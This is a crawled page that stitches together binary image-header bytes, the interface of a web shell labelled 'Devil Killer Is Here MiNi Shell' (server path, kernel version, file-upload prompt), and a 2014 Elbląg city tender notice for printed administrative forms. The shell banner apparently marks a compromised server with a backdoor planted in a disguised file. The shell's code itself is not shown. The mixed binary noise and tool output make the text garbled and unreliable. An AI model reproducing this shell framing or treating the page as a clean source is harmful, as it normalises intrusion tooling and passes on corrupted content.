JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140211/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140211/48296-N-2014.html

<p class="kh_header"><b>Elbląg: Dostawa druków dla Urzędu Miejskiego w Elblągu</b><br>
<b>Numer ogłoszenia: 48296 - 2014; data zamieszczenia: 11.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina - Miasto Elbląg , ul. Łączności 1, 82-300 Elbląg, woj. warmińsko-mazurskie, tel. 55 235 35 36, 55 239 31 25, faks 55 239 33 34.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umelblag.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa druków dla Urzędu Miejskiego w Elblągu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia:
Dostawa druków dla Urzędu Miejskiego w Elblągu

Przedmiot główny:
CPV: 22.80.00.00-8      
Nazewnictwo wg CPV: Rejestry, księgi rachunkowe, skoroszyty, formularze i inne wyroby piśmiennicze z papieru lub tektury

Przedmioty dodatkowe:
CPV: 22.42.00.00-0      
Nazewnictwo wg CPV:	Papier ze znakiem wodnym

CPV:	22.81.00.00-1      
Nazewnictwo wg CPV:	Rejestry papierowe lub tekturowe

CPV:	22.82.00.00-4      
Nazewnictwo wg CPV:	Formularze
 
2. Przedmiot i zakres zamówienia obejmuje dostawę druków dla Urzędu Miejskiego w Elblągu:
A. wzory standardowe:
1.  karta wędkarska - ilość 150 szt.
2.  zaświadczenie o rejestracji sprzętu pływającego do połowu ryb - ilość 100 szt.
3.  polecenie wyjazdu służbowego wg wzoru - ilość 700 szt.
4.  polecenie księgowania małe K167 (samokopiujący 1+1, kopia w innym kolorze) - ilość 15	bloczki po 100 kart
5.  polecenie księgowania duże K167 - ilość 5 bloczki po 100 kart
6.  noty księgowe - ilość 10	bloczki po 100 kart
7.  druki KW na papierze samokopiującym (1+1) - ilość 30 bloczki po 100 kart
8.  dowód wpłaty KP wg wzoru - ilość 30 bloczki po 100 kart
9.  informacja w sprawie podatku od nieruchomości IN-1 + dane o nieruchomościach ZN-1/A (jako całość) - ilość 10 000 szt.
10.  deklaracje na podatek od nieruchomości DN-1 ( druk DN-1 A-3 z załącznikami ZN-1A i ZN-1B zostanie przekazany przed realizacją z aktualnymi danymi) - ilość 3 000 szt.
11.  dane o nieruchomościach ZN-1/A + dane o zwolnieniach podatkowych w podatku od nieruchomości ZN-1/B (jako załącznik) - ilość 3 000 szt.
12.  druk IR - 1 + ZR - 1A ( form. A3 - załącznik jako całość) - ilość 500 szt.
13.  kartoteka magazynowa sztywna Gm-130 - ilość 800 szt.
14.  akt urodzenia podwójny składany M-1 wg wzoru, druki spójne z obowiązującym Systemem Rejestracji Aktów Stanu Cywilnego, którego autorem jest Przedsiębiorstwo Techniczno-Handlowe Technika, ul. Toszecka 2 w Gliwicach - ilość 500 szt.
15.  akt małżeństwa podwójny składany M-2 wg wzoru, druki spójne z obowiązującym Systemem Rejestracji Aktów Stanu Cywilnego, którego autorem jest Przedsiębiorstwo Techniczno-Handlowe Technika, ul. Toszecka 2 w Gliwicach - ilość 500 szt.
16.  akt zgonu podwójny składany M-3 wg wzoru, druki spójne z obowiązującym Systemem Rejestracji Aktów Stanu Cywilnego, którego autorem jest Przedsiębiorstwo Techniczno-Handlowe Technika, ul. Toszecka 2 w Gliwicach - ilość 500 szt.
17.  odpis zupełny aktu małżeństwa M-5 znak wodny wg wzoru, druki spójne z obowiązującym Systemem Rejestracji Aktów Stanu Cywilnego, którego autorem jest Przedsiębiorstwo Techniczno-Handlowe Technika, ul. Toszecka 2 w Gliwicach - ilość 200 szt.
18.  odpis zupełny aktu urodzenia M-4 znak wodny wg wzoru, druki spójne z obowiązującym Systemem Rejestracji Aktów Stanu Cywilnego, którego autorem jest Przedsiębiorstwo Techniczno-Handlowe Technika, ul. Toszecka 2 w Gliwicach - ilość 4 000 szt.
19.  odpis zupełny aktu zgonu M-6 znak wodny wg wzoru, druki spójne z obowiązującym Systemem Rejestracji Aktów Stanu Cywilnego, którego autorem jest Przedsiębiorstwo Techniczno-Handlowe Technika, ul. Toszecka 2 w Gliwicach - ilość 50 szt.
20.  odpis skrócony aktu urodzenia znak wodny M-8 wg wzoru, druki spójne z obowiązującym Systemem Rejestracji Aktów Stanu Cywilnego, którego autorem jest Przedsiębiorstwo Techniczno-Handlowe Technika, ul. Toszecka 2 w Gliwicach - ilość 10 000 szt.
21.   odpis skrócony aktu małżeństwa M-13 znak wodny wg wzoru, druki spójne z obowiązującym Systemem Rejestracji Aktów Stanu Cywilnego, którego autorem jest Przedsiębiorstwo Techniczno-Handlowe Technika, ul. Toszecka 2 w Gliwicach - ilość 5 000 szt.
22.  odpis skrócony aktu zgonu M-15 znak wodny wg wzoru, druki spójne z obowiązującym Systemem Rejestracji Aktów Stanu Cywilnego, którego autorem jest Przedsiębiorstwo Techniczno-Handlowe Technika, ul. Toszecka 2 w Gliwicach - ilość 5 000 szt.
23.  zaświadczenie o braku okoliczności wyłączających zawarcie małżeństwa M-201 znak wodny wg wzoru, druki spójne z obowiązującym Systemem Rejestracji Aktów Stanu Cywilnego, którego autorem jest Przedsiębiorstwo Techniczno-Handlowe Technika, ul. Toszecka 2 w Gliwicach - ilość 1 000 szt.
24.  zapewnienie M-17 składane wg wzoru, druki spójne z obowiązującym Systemem Rejestracji Aktów Stanu Cywilnego, którego autorem jest Przedsiębiorstwo Techniczno-Handlowe Technika, ul. Toszecka 2 w Gliwicach - ilość 500 szt.
25.  zaświadczenie o zdolności prawnej do zawarcia małżeństwa poza granicami kraju M-200 wg wzoru, druki spójne z obowiązującym Systemem Rejestracji Aktów Stanu Cywilnego, którego autorem jest Przedsiębiorstwo Techniczno-Handlowe Technika, ul. Toszecka 2 w Gliwicach - ilość 200 szt.
26.  protokół zawarcia małżeństwa poza lokalem USC - format A4 - ilość 50 szt.
27.  protokół w sprawie przyjęcia oświadczenia o powrocie do poprzedniego nazwiska - format A4 - ilość 50 szt.
28.  wniosek o nadanie medalu za długoletnie pożycie małżeńskie M-100 wg wzoru, druki spójne z obowiązującym Systemem Rejestracji Aktów Stanu Cywilnego, którego autorem jest Przedsiębiorstwo Techniczno-Handlowe Technika, ul. Toszecka 2 w Gliwicach  (na grubszym papierze) - ilość 200 szt.
29. wielojęzyczny odpis skrócony aktu urodzenia M-210 wg wzoru, druki spójne z obowiązującym Systemem Rejestracji Aktów Stanu Cywilnego, którego autorem jest Przedsiębiorstwo Techniczno-Handlowe Technika, ul. Toszecka 2 w Gliwicach - ilość 2 000 szt.
30. wielojęzyczny odpis skrócony aktu małżeństwa M-211 wg wzoru, druki spójne z obowiązującym Systemem Rejestracji Aktów Stanu Cywilnego, którego autorem jest Przedsiębiorstwo Techniczno-Handlowe Technika, ul. Toszecka 2 w Gliwicach - ilość 1 000 szt.
31. wielojęzyczny odpis skrócony aktu zgonu M-212 wg wzoru, druki spójne z obowiązującym Systemem Rejestracji Aktów Stanu Cywilnego, którego autorem jest Przedsiębiorstwo Techniczno-Handlowe Technika, ul. Toszecka 2 w Gliwicach - ilość 100 szt.
32. odpis skrócony aktu urodzenia M-8a ewidencja wg wzoru, druki spójne z obowiązującym Systemem Rejestracji Aktów Stanu Cywilnego, którego autorem jest Przedsiębiorstwo Techniczno-Handlowe Technika, ul. Toszecka 2 w Gliwicach - ilość 500 szt.
33. odpis skrócony aktu małżeństwa M-13a ewidencja wg wzoru, druki spójne z obowiązującym Systemem Rejestracji Aktów Stanu Cywilnego, którego autorem jest Przedsiębiorstwo Techniczno-Handlowe Technika, ul. Toszecka 2 w Gliwicach - ilość 1 000 szt.
34. spis spraw Pu Kn-4 wg wzoru - ilość 4 500 szt.
35. wezwanie do złożenia wyjaśnień/zeznań/udziału wg wzoru - ilość 100 szt.
36. Oświadczenie członka rodziny o dochodzie podlegającym opodatkowaniu podatkiem dochodowym od osób fizycznych, na zasadach określonych w art. 27,30b, 30c, 30e, ustawy z dnia 26 lipca 1991 r. o podatku dochodowym od osób fizycznych osiągniętym w roku kalendarzowym poprzedzającym okres zasiłkowy (format A4) - ilość 2 000 szt.
37. Oświadczenie członka rodziny o dochodzie podlegającym opodatkowaniu podatkiem dochodowym od osób fizycznych, na zasadach określonych w art. 27,30b, 30c, 30e, ustawy z dnia 26 lipca 1991 r. o podatku dochodowym od osób fizycznych osiągniętym w roku kalendarzowym poprzedzającym okres świadczeniowy (format A4) - ilość 2 000 szt.
38. wniosek o ustalenie prawa do zasiłku rodzinnego oraz dodatków do zasiłku rodzinnego - ilość	8 000 szt.
39. wniosek o ustalenie prawa do zasiłku pielęgnacyjnego - ilość 1 300 szt.
40. wniosek o ustalenie prawa do świadczenia pielęgnacyjnego - ilość 1 200 szt.
41. wniosek o ustalenie prawa do świadczeń z funduszu alimentacyjnego - ilość 1 800 szt.
42. wniosek o ustalenie prawa do jednorazowej zapomogi z tytułu urodzenia się dziecka szt. (4 strony A4) - ilość 1 000 szt.
43. oświadczenie członków rodziny rozliczających się na podstawie przepisów o zryczałtowanym podatku dochodowym od niektórych przychodów osiąganych przez osoby fizyczne o wysokości dochodu uzyskanego w roku kalendarzowym poprzedzającym okres zasiłkowy (format A5, druk dwustronny) - ilość 20 000 szt.
44. oświadczenie o dochodzie członków rodziny rozliczających się na podstawie przepisów o zryczałtowanym podatku dochodowym od niektórych przychodów osiąganych przez osoby fizyczne, uzyskanym w roku kalendarzowym poprzedzającym okres świadczeniowy (format A5, druk dwustronny) - ilość 3 600 szt.
45. oświadczenie o dochodzie członka rodziny niepodlegającym opodatkowaniu podatkiem dochodowym od osób fizycznych, uzyskanym w roku kalendarzowym poprzedzającym okres świadczeniowy (format A4) - ilość 2 000 szt.
46. Oświadczenie członka rodziny o dochodzie niepodlegającym opodatkowaniu podatkiem dochodowym od osób fizycznych, osiągniętym w roku kalendarzowym poprzedzającym okres zasiłkowy (format A4) - ilość 20 000 szt.
47. kwestionariusz wywiadu alimentacyjnego (format A4) - ilość 600 szt.
48. oświadczenie majątkowe dłużnika alimentacyjnego (format A4) - ilość 600 szt.
49. wniosek o przyznanie  jednorazowej zapomogi z tytułu urodzenia dziecka szt. (3 strony A4) - ilość 100 szt.
50. Pismo w zakresie dokumentów oraz poprawiania wniosku do świadczeń rodzinnych - druk samokopiujący - format A5   UWAGA! Na stronie kopii adnotacja - Otrzymałem/łam dnia ... - ilość 13 bloczki po 100 szt. kompl. (oryginał + kopia)
51. Pismo w zakresie dokumentów oraz poprawiania wniosku do funduszu alimentacyjnego - druk samokopiujący - format A5   UWAGA! Na stronie kopii adnotacja - Otrzymałem/łam dnia ... - ilość 10 bloczki po 100 szt. kompl. (oryginał + kopia)
52. Pismo w zakresie dokumentów oraz poprawiania wniosku do świadczeń rodzinnych - druk samokopiujący - format A4  UWAGA! Na stronie kopii adnotacja - Otrzymałem/łam dnia ... - ilość 5 bloczki po 100 szt. kompl. (oryginał + kopia)
53. Pismo w zakresie dokumentów oraz poprawiania wniosku do funduszu alimentacyjnego - druk samokopiujący - format A4   UWAGA! Na stronie kopii adnotacja - Otrzymałem/łam dnia ... - ilość 5 bloczki po 100 szt. kompl. (oryginał + kopia)
54. Pismo w zakresie dokumentów oraz poprawiania wniosku do świadczeń rodzinnych i funduszu alimentacyjnego - druk samokopiujący - format A5   UWAGA! Na stronie kopii adnotacja - Otrzymałem/łam dnia ... -  ilość 15 bloczki po 100 szt. kompl. (oryginał + kopia)
55. Pismo w zakresie dokumentów oraz poprawiania wniosku do świadczeń rodzinnych i funduszu alimentacyjnego - druk samokopiujący - format A4   UWAGA! Na stronie kopii adnotacja - Otrzymałem/łam dnia ... -  ilość 5 bloczki po 100 szt. kompl. (oryginał + kopia)
56. koperty dowodowe   na dokumentację -  formatu 160mm-220mm wg wzoru (koperty o dużej trwałości użytkowej z grubszego papieru) - ilość 7 000 szt.
57. wniosek o wydanie dowodu osobistego D-1 format A4 - ilość 30 000 szt.
58. zgłoszenie pobytu stałego - format A5 - ilość 12 000 szt.
59 zgłoszenie wymeldowania z miejsca pobytu stałego - format A5 - ilość 10 000 szt.
60. zgłoszenie wymeldowania z miejsca pobytu czasowego trwającego ponad 3 miesiące - format A5 - ilość 5 000 szt.
61. zgłoszenie pobytu czasowego trwającego ponad 3 miesiące - format A5 - ilość 5 000 szt.
62. poświadczenie - ilość 400 szt.
63. księga kontowa Pu-K-193 - ilość 40 szt.
64. zezwolenie do kierowania pojazdem uprzywilejowanym lub pojazdem przewożącym wartości pieniężne (barwa tła - różowa, barwa napisów - czarna) - ilość 150 szt.
B. wzory własne:
1. ZPO - papier offsetowy BD 140-200g/m2, wymiar druku: 90 x 140 mm (część środkowa, bez listew bocznych) najbardziej optymalne wymiary: część środkowa bez listew bocznych - 100 x 140 mm, całość druku, tj. część środkowa + listwy boczne - 100 x 160 mm, wszystkie wymiary przyjmuje się z tolerancją 2 mm, listwy po obu stronach, perforacja pionowa pozwalająca na wyrwanie środkowej części druku bez jego uszkodzenia, co najmniej 5 mm pasek kleju gwarantujący przyczepność do różnego rodzaju podłoża w zróżnicowanym zakresie temperatur zabezpieczony osłoną, adres na stronie tytułowej napisany/nadrukowany w strefie prostokątnej w minimalnej odległości: 40 mm od górnego brzegu, 05 mm od prawego brzegu, 15 mm od dolnego brzegu. W pasie 15 mm powyżej dolnej krawędzi strony przedniej druku (awers) oraz z prawej strony danych adresowych nadawcy nie można umieszczać żadnych napisów/nadruków -  ilość 248 900 szt.
2. teczka akt ewidencyjnych pojazdu na dokumentację, tektura, wewnątrz skoroszyt, na gumkę z zabezpieczoną blaszką z tyłu (teczki grubości zwiększającej jej trwałość) - ilość 5 000 szt.
3. wniosek o rejestrację pojazdu - ilość 10 000 szt.
4. zawiadomienie o zbyciu pojazdu wg wzoru - ilość 3 000 szt.
5. zawiadomienie o zagubieniu/zniszczeniu/kradzieży  karty pojazdu i prośba o wydanie wtórnika karty pojazdu wg wzoru - format A4 - ilość 50 szt.
6. zawiadomienie o montażu instalacji gazowej wg wzoru - ilość 200 szt.
7. spis dokumentów w teczce wg wzoru - ilość 3 000 szt.
8. podanie o wymianę dowodu rejestracyjnego z powodu braku miejsc na badanie techniczne wg wzoru - ilość 5 000 szt.
9. zawiadomienie o zmianie nazwiska wg  wzoru - ilość 300 szt.
10. podanie o dopisanie/wykreślenie współwłaściciela z dowodu rejestracyjnego wg wzoru - ilość 500 szt.
11. zaświadczenie o zmianie adresu wg wzoru - format A5 - ilość 300 szt.
12. podanie o wydanie zatrzymanego dowodu rejestracyjnego - format A5 - ilość 1 000 szt.
13. spis spraw - format A4 - ilość 1 000 szt.
14. zawiadomienie o przystosowaniu pojazdu do przewozu osób (TAXI) wg wzoru - ilość 100 szt.
15. wniosek o wyrejestrowanie pojazdu - format A4 - ilość 1 000 szt.
16. teczka akta ewidencyjne kierowcy na dokumentację, tektura, wewnątrz skoroszyt, na gumkę z zabezpieczoną blaszką z tyłu (teczki grubości zwiększającej jej trwałość) - ilość 3 000 szt.
17. zawiadomienie o zgubieniu/zniszczeniu/kradzieży dowodu rejestracyjnego/pozwolenia czasowego i prośba o wydanie wtórnika dowodu rejestracyjnego/pozwolenia czasowego - format A4 - ilość 200 szt.
18. podanie o wydanie wtórnika nalepki kontrolnej - format A5 - ilość 200 szt.
19. wniosek o czasowe wycofanie pojazdu z ruchu - format A4 - ilość 100 szt.
20. podanie o dopisanie/wykreślenie żony/męża jako współwłaściciela do dowodu rejestracyjnego wg wzoru - format A4 - ilość 300 szt.
21. Pełnomocnictwo do zasiłku alimentacyjnego (format A5) - ilość 500 szt.
22. pełnomocnictwo do zasiłku pielęgnacyjnego (format A5) - ilość 500 szt.
23. oświadczenie pod rygorem odpowiedzialności karnej format A5 szt. - ilość	3 000 szt.
24. Oświadczenie o przebywaniu bądź nie przebywaniu członka rodziny za granicą - ilość 5 000 szt
25. Formularz (oświadczenie) dla potrzeb ustalenia ustawodawstwa państwa właściwego do wypłaty świadczeń rodzinnych (format A4) - ilość 300 szt.
26. druk o wydanie zaświadczenia (formularz A5) - ilość 1 000 szt.
27. oświadczenie dotyczące formy płatności (format A5) szt. - ilość 600 szt.
28. oświadczenie o ubezpieczeniu społecznym i zdrowotnym - ilość 1 200 szt.
29. Oświadczenie o sytuacji materialno-bytowej - ilość 300 szt.
30. oświadczenie pod rygorem odpowiedzialności karnej - ilość 2 000 szt.
C. druki firmowe:
1. wizytówki - ilość	3 000 szt.
2. papier firmowy z herbem	- ilość 3 000 szt.
3. teczka firmowa (wersja1) biała - ilość 500 szt.
4. oprawa twarda w kolorze  białym perłowa z wizerunkiem orła w koronie (nadruk 1/1 złoto tłoczone po obu stronach), z napisem PREZYDENT ELBLĄGA UROCZYSTY AKT NARODZIN DZIECKA (wewnątrz oprawy dwa skrzydełka  w kolorze oprawy) w środku wkładka (litery złote), papier STARDREAM 230 g - ilość 4 000 szt.
5. wkładka miękka do uroczystego aktu narodzin dziecka - ilość 2 000 szt.
6. oprawa twarda w kolorze kremowym (wewnątrz oprawy dwa skrzydełka  w kolorze oprawy) w środku wkładka, nadruk z wizerunkiem orła w koronie (złoto tłoczone po stronie wewnętrznej), z napisem URZĄD STANU CYWILNEGO ELBLĄG, papier STARDREAM 230 g - ilość 2 000 szt.
7. wkładka pamiątkowa w kolorze kremowym - ilość 1 000 szt.
8. twarda okładka na dokumenty po rejestracji zgonu w kolorze fioletowym (wewnątrz oprawy dwa skrzydełka) w kolorze oprawy) nadruk z wizerunkiem orła w koronie (złoto tłoczone po stronie wewnętrznej), z napisem URZĄD STANU CYWILNEGO ELBLĄG, papier STARDREAM 230 g - ilość 3 000 szt.
9. oprawa na dokumenty ( twarda oprawa - płótno) koloru wiśniowego  z herbem, ze złotym nadrukiem (obie zewnętrzne strony koloru wiśniowego, czcionka Antykwa Toruńska, wielkości 22 pkt.) Przewodniczący Rady Miasta w Elbląg do wkładania wewnątrz dokumentów formatu A4 - ilość 50 szt.
10. oprawa na dokumenty ( twarda oprawa - płótno) koloru wiśniowego  z herbem, ze złotym nadrukiem (obie zewnętrzne strony koloru wiśniowego, czcionka Antykwa Toruńska, wielkości 22 pkt.) Rada Miejska w Elblągu do wkładania wewnątrz dokumentów formatu A4 - ilość 50 szt.

Wzór logotypu herbu Elbląga musi być zgodny z pkt 1.1 - 1.4 i 1.6 - 1.10 Systemu Identyfikacji Wizualnej dla Urzędu Miejskiego w Elblągu przekazanym w ZAŁĄCZNIKU NR 5 do SIWZ.

Wymagane formaty druków, wymagane ilości w poszczególnych etapach dostawy oraz miejsca dostawy, określono w ZAŁĄCZNIKU NR 6 do SIWZ - Wzory standardowe, w ZAŁĄCZNIKU NR 7 do SIWZ - Wzory własne i w ZAŁĄCZNIKU NR 8 do SIWZ - Druki firmowe.

Skany wzorów druków - Wzory standardowe przekazane są wraz ze Specyfikacją Istotnych Warunków Zamówienia jako ZAŁĄCZNIK NR 9 do SIWZ.

Skany wzorów druków - Wzory własne przekazane są wraz ze Specyfikacją Istotnych Warunków Zamówienia jako ZAŁĄCZNIK NR 10 do SIWZ.

Skany wzorów druków - Druki firmowe przekazane są wraz ze Specyfikacją Istotnych Warunków Zamówienia jako ZAŁĄCZNIK NR 11 do SIWZ.  	 
 
3. Faktury za druki dostarczone dla Departamentu Świadczeń Rodzinnych zostaną przesłane na adres: Departament Świadczeń Rodzinnych, UM Elbląg, ul. Jaśminowa 11, a faktury za resztę dostaw na adres: Departament Organizacji i Nadzoru, UM Elbląg, ul. Łączności 1, 82-300 Elbląg.
4. Druki muszą być zgodne z wzorami Zamawiającego opisanymi w pkt III. ppkt 2. SIWZ oraz opisanymi w ZAŁĄCZNIKU NR 6 do SIWZ - Wzory standardowe, w ZAŁĄCZNIKU NR 7 do SIWZ - Wzory własne i w ZAŁĄCZNIKU NR 8 do SIWZ - Druki firmowe, a ich jakość musi odpowiadać jakości posiadanych przez Zamawiającego wzorów.
5. Zakres zamówienia obejmuje dostawę druków dla Departamentów Urzędu Miejskiego w Elblągu wg wskazanych miejsc dostaw z podziałem na cztery etapy dostaw:
 I etap - w terminie 3 tygodni od daty udzielenia zamówienia 
II etap - w terminie do 31 lipca 2014 r.
III etap -  w terminie do 30 września 2014 r.
IV etap - w terminie do 31 grudnia 2014 r.
                - poz 1. - wizytówki z pkt III. ppkt 2. lit. C SIWZ sukcesywnie w miarę potrzeb Zamawiającego.
6. Zamawiający może, w sytuacjach uzasadnionych, wymagać wcześniejszych, niż wskazane terminy dostaw. Wykonawca będzie zobowiązany dostarczyć dokumenty w ciągu 7 dni od powiadomienia faxem, e-mailem lub telefonicznie.
7. Zamawiający zastrzega sobie możliwość wymiany wzorów druków przekazanych wraz z dokumentacją przetargową na podstawie aktualizujących je przepisów prawnych. Zamawiający niezwłocznie po ukazaniu się aktów prawnych przekaże Wykonawcy nowe wzory druków.
8. Wzory druków wymienionych w ZAŁĄCZNIKU NR 6 do SIWZ - Wzory standardowe, w ZAŁĄCZNIKU NR 7 do SIWZ - Wzory własne i w ZAŁĄCZNIKU NR 8 do SIWZ - Druki firmowe znajdują się do wglądu w siedzibie Zamawiającego, tj. w Urzędzie Miejskim w Elblągu, Departament Organizacji i Nadzoru Referat Obsługi Urzędu, pok. 304.
9. Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy. 
10. Zamawiający żąda wskazania przez Wykonawcę w ofercie części zamówienia, której wykonanie zamierza powierzyć podwykonawcy. Zamawiający żąda podania przez Wykonawcę w ofercie nazw (firm) podwykonawców, na których zasoby Wykonawca powołuje się na zasadach określonych w art. 26 ust. 2b, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 22.80.00.00-8, 22.42.00.00-0, 22.81.00.00-1, 22.82.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
